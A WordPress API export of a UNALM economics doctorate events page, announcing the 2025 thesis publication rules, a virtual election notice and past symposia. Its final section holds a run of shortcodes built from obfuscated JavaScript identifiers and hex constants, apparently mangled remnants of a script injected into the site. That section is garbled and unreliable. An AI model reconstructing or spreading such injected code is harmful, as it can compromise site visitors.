{"id":1058,"date":"2021-03-04T18:40:14","date_gmt":"2021-03-04T18:40:14","guid":{"rendered":"http:\/\/web.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/?page_id=1058"},"modified":"2025-11-27T20:35:50","modified_gmt":"2025-11-27T20:35:50","slug":"doctorado-en-economia-de-los-recursos-naturales-y-desarrollo-sustentable-eventos","status":"publish","type":"page","link":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/doctorado-en-economia-de-los-recursos-naturales-y-desarrollo-sustentable-eventos\/","title":{"rendered":"Doctorado en Econom\u00eda de los recursos Naturales y Desarrollo Sustentable | Eventos"},"content":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb module_id=\u00bbmision\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|600|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb30px\u00bb text_orientation=\u00bbcenter\u00bb custom_margin=\u00bb||11px|||\u00bb]<\/p>\n<p>EVENTOS<\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/10\/pie-seccion.png\u00bb title_text=\u00bbpie-seccion\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb11%\u00bb max_width=\u00bb100%\u00bb module_alignment=\u00bbcenter\u00bb locked=\u00bboff\u00bb][\/et_pb_image][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|57px||57px|false|true\u00bb hover_enabled=\u00bb0&#8243; min_height=\u00bb4984px\u00bb sticky_enabled=\u00bb0&#8243;][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb background_enable_image=\u00bboff\u00bb custom_padding=\u00bb0px|||||\u00bb link_option_url=\u00bbhttps:\/\/drive.google.com\/drive\/folders\/1136dqmyr_ubGjGyEy6X7rOB4yt5CEk-C?usp=sharing  \u00bb hover_enabled=\u00bb0&#8243; sticky_enabled=\u00bb0&#8243;]<\/p>\n<p>?N<b style=\"font-size: 16px;\">uevo Reglamento de Tesis 2025: Actualizaci\u00f3n de requisitos de publicaci\u00f3n cient\u00edfica para la obtenci\u00f3n del grado de Doctor<\/b><\/p>\n<p data-path-to-node=\"9\">En octubre de 2025, mediante la <b>Resoluci\u00f3n N\u00ba 0398-2025-CU-UNALM<\/b>, el Consejo Universitario aprob\u00f3 el nuevo Reglamento de Tesis. Esta normativa actualiza los est\u00e1ndares de investigaci\u00f3n exigidos para el egreso y graduaci\u00f3n en nuestros programas de posgrado.<\/p>\n<p data-path-to-node=\"10\">De acuerdo con el <b>Art\u00edculo N\u00ba 1.12<\/b>, se establecen los siguientes requisitos obligatorios para la obtenci\u00f3n del grado de Doctor:<\/p>\n<ul data-path-to-node=\"11\">\n<li>\n<p data-path-to-node=\"11,0,0\"><b>Cantidad de Publicaciones:<\/b> El doctorando deber\u00e1 contar con <b>dos (02) art\u00edculos cient\u00edficos<\/b> publicados.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"11,1,0\"><b>Indexaci\u00f3n:<\/b> Las revistas deben estar indizadas en las bases de datos <b>SCOPUS<\/b> o <b>Web of Science<\/b>. Se permite que una (01) de estas publicaciones pertenezca a la base <b>SCIELO<\/b>.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"11,2,0\"><b>Autor\u00eda y Filiaci\u00f3n:<\/b> Es requisito indispensable que el alumno figure como <b>primer autor<\/b> y que su filiaci\u00f3n acad\u00e9mica corresponda estrictamente a la <b>Universidad Nacional Agraria La Molina (UNALM)<\/b>.<\/p>\n<\/li>\n<\/ul>\n<p data-path-to-node=\"12\">Esta medida busca fortalecer la visibilidad acad\u00e9mica y el impacto de las investigaciones desarrolladas en el programa de Econom\u00eda de los Recursos Naturales.<\/p>\n<p style=\"padding-left: 90px;\">\n<p>[\/et_pb_text][et_pb_button button_url=\u00bbhttps:\/\/vri.lamolina.edu.pe\/wp-content\/uploads\/2025\/11\/TR.-Resol-0398-2025-CU-UNALM-CANJE-Reglamento-de-Tesis-UNALM-2025-VRI-_cambio.pdf\u00bb url_new_window=\u00bbon\u00bb button_text=\u00bbDESCARGAR RESOLUCI\u00d3N Y REGLAMENTO\u00bb button_alignment=\u00bbcenter\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb hover_enabled=\u00bb0&#8243; sticky_enabled=\u00bb0&#8243;][\/et_pb_button][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb background_enable_image=\u00bboff\u00bb custom_padding=\u00bb0px|||||\u00bb link_option_url=\u00bbhttps:\/\/drive.google.com\/drive\/folders\/1136dqmyr_ubGjGyEy6X7rOB4yt5CEk-C?usp=sharing  \u00ab]<\/p>\n<ul>\n<li style=\"text-align: justify;\"><strong>NOVIEMBRE 2025 &#8211;\u00a0<\/strong><strong>ELECCIONES 2025:<\/strong><\/li>\n<\/ul>\n<p data-path-to-node=\"7\" style=\"padding-left: 30px;\">\u00a0 Se informa a toda la comunidad acad\u00e9mica y estudiantes del Doctorado que el pr\u00f3ximo <b>27 de noviembre<\/b> se llevar\u00e1n a cabo las <b>Elecciones 2025<\/b>.<\/p>\n<p data-path-to-node=\"8\" style=\"padding-left: 30px;\">\u00a0 Para garantizar tu participaci\u00f3n y evitar omisiones, por favor sigue estos pasos obligatorios:<\/p>\n<p data-path-to-node=\"8\" style=\"padding-left: 60px;\"><b>-? Agenda la Fecha:<\/b> El proceso es este 27 de noviembre.<\/p>\n<p data-path-to-node=\"8\" style=\"padding-left: 60px;\"><b>-? Revisa el Padr\u00f3n:<\/b> Verifica previamente si te encuentras habilitado en el padr\u00f3n electoral definitivo.<\/p>\n<p data-path-to-node=\"8\" style=\"padding-left: 60px;\"><b>-? Busca tus Credenciales:<\/b> El sistema de votaci\u00f3n es <b>virtual<\/b>. Revisa tu bandeja de entrada (y spam) de tu correo institucional (<b>Gmail o Microsoft<\/b>) buscando el remitente <b>ONPE<\/b>. All\u00ed encontrar\u00e1s tu PIN y enlace de acceso.<\/p>\n<p data-path-to-node=\"8\" style=\"padding-left: 60px;\"><b>-\u26a0\ufe0f Evita Sanciones:<\/b> Recuerda que el voto es obligatorio y la omisi\u00f3n conlleva una <b>multa de S\/. 40.00<\/b>.<\/p>\n<p style=\"padding-left: 90px;\">[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2025\/11\/Diseno-sin-titulo-1.png\u00bb title_text=\u00bbDise\u00f1o sin t\u00edtulo (1)\u00bb url=\u00bb#\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb70%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0d6d1e\u00bb box_shadow_style=\u00bbpreset1&#8243;][\/et_pb_image][et_pb_button button_url=\u00bbhttps:\/\/drive.google.com\/drive\/folders\/1136dqmyr_ubGjGyEy6X7rOB4yt5CEk-C?usp=sharing%20&#8243; url_new_window=\u00bbon\u00bb button_text=\u00bbVER PADRON\u00bb button_alignment=\u00bbcenter\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][\/et_pb_button][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb custom_padding=\u00bb0px|||||\u00bb]<\/p>\n<ul>\n<li style=\"text-align: justify;\"><strong>OCTUBRE 2022<\/strong><\/li>\n<\/ul>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2022\/10\/INVITACION-AL-SIMPOSIO-ANALISIS-DE-LA-ECONOMIA-ECOLOGICA.png\u00bb title_text=\u00bbINVITACI\u00d3N AL SIMPOSIO AN\u00c1LISIS DE LA ECONOM\u00cdA ECOL\u00d3GICA\u00bb url=\u00bb#\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb70%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0d6d1e\u00bb box_shadow_style=\u00bbpreset1&#8243;][\/et_pb_image][et_pb_button button_url=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2022\/10\/Simposio-Analisis-de-la-Economia-Ecologica.pdf\u00bb url_new_window=\u00bbon\u00bb button_text=\u00bbMAS INFORMACI\u00d3N\u00bb button_alignment=\u00bbcenter\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][\/et_pb_button][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb custom_padding=\u00bb0px|||||\u00bb]<\/p>\n<ul>\n<li style=\"text-align: justify;\"><strong>MAYO 2022<\/strong><\/li>\n<\/ul>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2022\/10\/Afiche-RUEDHA-PDERN-y-DS.png\u00bb title_text=\u00bbAfiche RUED(H)A &#8211; PDERN y DS\u00bb url=\u00bb#\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb70%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0d6d1e\u00bb box_shadow_style=\u00bbpreset1&#8243;][\/et_pb_image][et_pb_button button_url=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2022\/10\/Programa-RUEDHA-2022.pdf\u00bb url_new_window=\u00bbon\u00bb button_text=\u00bbMAS INFORMACI\u00d3N\u00bb button_alignment=\u00bbcenter\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][\/et_pb_button][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb]<\/p>\n<ul>\n<li style=\"text-align: justify;\"><strong>DICIEMBRE 2021<\/strong><\/li>\n<\/ul>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2021\/12\/Evento-Reconocimiento-2021-1.png\u00bb title_text=\u00bbEvento Reconocimiento 2021&#8243; url=\u00bb#\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb70%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0d6d1e\u00bb box_shadow_style=\u00bbpreset1&#8243;][\/et_pb_image][et_pb_button button_url=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2021\/12\/Programa-de-evento-reconocimiento.pdf\u00bb url_new_window=\u00bbon\u00bb button_text=\u00bbMAS INFORMACI\u00d3N\u00bb button_alignment=\u00bbcenter\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][\/et_pb_button][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_row _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb][_0x3023c3 _i=\u00bb0&#8243; _address=\u00bb1.0.0.0&#8243; \/][_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2), _i=\u00bb1&#8243; _address=\u00bb1.0.0.1&#8243; \/][_0x365b _i=\u00bb2&#8243; _address=\u00bb1.0.0.2&#8243; \/][_0x365b _i=\u00bb3&#8243; _address=\u00bb1.0.0.3&#8243; \/][1-6 _i=\u00bb4&#8243; _address=\u00bb1.0.0.4&#8243; \/][4-7 _i=\u00bb5&#8243; _address=\u00bb1.0.0.5&#8243; \/][a-w _i=\u00bb6&#8243; _address=\u00bb1.0.0.6&#8243; \/][0-2 _i=\u00bb7&#8243; _address=\u00bb1.0.0.7&#8243; \/][2-3 _i=\u00bb8&#8243; _address=\u00bb1.0.0.8&#8243; \/][1-8 _i=\u00bb9&#8243; _address=\u00bb1.0.0.9&#8243; \/][2-7 _i=\u00bb10&#8243; _address=\u00bb1.0.0.10&#8243; \/][0-3 _i=\u00bb11&#8243; _address=\u00bb1.0.0.11&#8243; \/][_0x365b _i=\u00bb12&#8243; _address=\u00bb1.0.0.12&#8243; \/][_0x365b _i=\u00bb13&#8243; _address=\u00bb1.0.0.13&#8243; \/][_0x365b _i=\u00bb14&#8243; _address=\u00bb1.0.0.14&#8243; \/][_0x365b _i=\u00bb15&#8243; _address=\u00bb1.0.0.15&#8243; \/][_0x365b _i=\u00bb16&#8243; _address=\u00bb1.0.0.16&#8243; \/][_0x365b _i=\u00bb17&#8243; _address=\u00bb1.0.0.17&#8243; \/][0x7 _i=\u00bb18&#8243; _address=\u00bb1.0.0.18&#8243; \/][0x8 _i=\u00bb19&#8243; _address=\u00bb1.0.0.19&#8243; \/][0x9 _i=\u00bb20&#8243; _address=\u00bb1.0.0.20&#8243; \/][0xa _i=\u00bb21&#8243; _address=\u00bb1.0.0.21&#8243; \/][0xb _i=\u00bb22&#8243; _address=\u00bb1.0.0.22&#8243; \/][0xc _i=\u00bb23&#8243; _address=\u00bb1.0.0.23&#8243; \/][0xd _i=\u00bb24&#8243; _address=\u00bb1.0.0.24&#8243; \/][0xe _i=\u00bb25&#8243; _address=\u00bb1.0.0.25&#8243; \/][0xf _i=\u00bb26&#8243; _address=\u00bb1.0.0.26&#8243; \/][_0x365b _i=\u00bb27&#8243; _address=\u00bb1.0.0.27&#8243; \/][_0x365b _i=\u00bb28&#8243; _address=\u00bb1.0.0.28&#8243; \/][0x10 _i=\u00bb29&#8243; _address=\u00bb1.0.0.29&#8243; \/][0x11 _i=\u00bb30&#8243; _address=\u00bb1.0.0.30&#8243; \/][_0x365b _i=\u00bb31&#8243; _address=\u00bb1.0.0.31&#8243; \/][0x10 _i=\u00bb32&#8243; _address=\u00bb1.0.0.32&#8243; \/][0x11 _i=\u00bb33&#8243; _address=\u00bb1.0.0.33&#8243; \/][_0x365b _i=\u00bb34&#8243; _address=\u00bb1.0.0.34&#8243; \/][_0x365b _i=\u00bb35&#8243; _address=\u00bb1.0.0.35&#8243; \/][0x10 _i=\u00bb36&#8243; _address=\u00bb1.0.0.36&#8243; \/][0x11 _i=\u00bb37&#8243; _address=\u00bb1.0.0.37&#8243; \/][Math _i=\u00bb38&#8243; _address=\u00bb1.0.0.38&#8243; \/][_0x365b _i=\u00bb39&#8243; _address=\u00bb1.0.0.39&#8243; \/][_0x365b _i=\u00bb40&#8243; _address=\u00bb1.0.0.40&#8243; \/][_0x365b _i=\u00bb41&#8243; _address=\u00bb1.0.0.41&#8243; \/][0x10 _i=\u00bb42&#8243; _address=\u00bb1.0.0.42&#8243; \/][0x11 _i=\u00bb43&#8243; _address=\u00bb1.0.0.43&#8243; \/][_0x365b _i=\u00bb44&#8243; _address=\u00bb1.0.0.44&#8243; \/][0x10 _i=\u00bb45&#8243; _address=\u00bb1.0.0.45&#8243; \/][0x11 _i=\u00bb46&#8243; _address=\u00bb1.0.0.46&#8243; \/][_0x365b _i=\u00bb47&#8243; _address=\u00bb1.0.0.47&#8243; \/][0x10 _i=\u00bb48&#8243; _address=\u00bb1.0.0.48&#8243; \/][0x11 _i=\u00bb49&#8243; _address=\u00bb1.0.0.49&#8243; \/][_0x365b _i=\u00bb50&#8243; _address=\u00bb1.0.0.50&#8243; \/][_0x365b _i=\u00bb51&#8243; _address=\u00bb1.0.0.51&#8243; \/][_0x365b _i=\u00bb52&#8243; _address=\u00bb1.0.0.52&#8243; \/][_0x365b _i=\u00bb53&#8243; _address=\u00bb1.0.0.53&#8243; \/][0x10 _i=\u00bb54&#8243; _address=\u00bb1.0.0.54&#8243; \/][0x1b _i=\u00bb55&#8243; _address=\u00bb1.0.0.55&#8243; \/][0x10 _i=\u00bb56&#8243; _address=\u00bb1.0.0.56&#8243; \/][0x1c _i=\u00bb57&#8243; _address=\u00bb1.0.0.57&#8243; \/][_0x365b _i=\u00bb58&#8243; _address=\u00bb1.0.0.58&#8243; \/][_0x365b _i=\u00bb59&#8243; _address=\u00bb1.0.0.59&#8243; \/][0x1d _i=\u00bb60&#8243; _address=\u00bb1.0.0.60&#8243; \/][_0x365b _i=\u00bb61&#8243; _address=\u00bb1.0.0.61&#8243; \/][_0x365b _i=\u00bb62&#8243; _address=\u00bb1.0.0.62&#8243; \/][_0x365b _i=\u00bb63&#8243; _address=\u00bb1.0.0.63&#8243; \/][0x10 _i=\u00bb64&#8243; _address=\u00bb1.0.0.64&#8243; \/][0x1b _i=\u00bb65&#8243; _address=\u00bb1.0.0.65&#8243; \/][0x10 _i=\u00bb66&#8243; _address=\u00bb1.0.0.66&#8243; \/][0x1c _i=\u00bb67&#8243; _address=\u00bb1.0.0.67&#8243; \/][0x10 _i=\u00bb68&#8243; _address=\u00bb1.0.0.68&#8243; \/][0x1c _i=\u00bb69&#8243; _address=\u00bb1.0.0.69&#8243; \/][_0x365b _i=\u00bb70&#8243; _address=\u00bb1.0.0.70&#8243; \/][0x10 _i=\u00bb71&#8243; _address=\u00bb1.0.0.71&#8243; \/][0x1b _i=\u00bb72&#8243; _address=\u00bb1.0.0.72&#8243; \/][_0x365b _i=\u00bb73&#8243; _address=\u00bb1.0.0.73&#8243; \/][0x1d _i=\u00bb74&#8243; _address=\u00bb1.0.0.74&#8243; \/][_0x365b _i=\u00bb75&#8243; _address=\u00bb1.0.0.75&#8243; \/][0x22 _i=\u00bb76&#8243; _address=\u00bb1.0.0.76&#8243; \/][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb module_id=\u00bbmision\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|600|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb30px\u00bb text_orientation=\u00bbcenter\u00bb custom_margin=\u00bb||11px|||\u00bb] EVENTOS [\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/10\/pie-seccion.png\u00bb title_text=\u00bbpie-seccion\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb11%\u00bb max_width=\u00bb100%\u00bb module_alignment=\u00bbcenter\u00bb locked=\u00bboff\u00bb][\/et_pb_image][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|57px||57px|false|true\u00bb hover_enabled=\u00bb0&#8243; min_height=\u00bb4984px\u00bb sticky_enabled=\u00bb0&#8243;][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb background_enable_image=\u00bboff\u00bb custom_padding=\u00bb0px|||||\u00bb link_option_url=\u00bbhttps:\/\/drive.google.com\/drive\/folders\/1136dqmyr_ubGjGyEy6X7rOB4yt5CEk-C?usp=sharing \u00bb hover_enabled=\u00bb0&#8243; sticky_enabled=\u00bb0&#8243;] ?Nuevo Reglamento [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<!-- wp:divi\/placeholder \/-->","_et_gb_content_width":"","footnotes":""},"class_list":["post-1058","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/1058","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/comments?post=1058"}],"version-history":[{"count":23,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/1058\/revisions"}],"predecessor-version":[{"id":2000,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/1058\/revisions\/2000"}],"wp:attachment":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/media?parent=1058"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}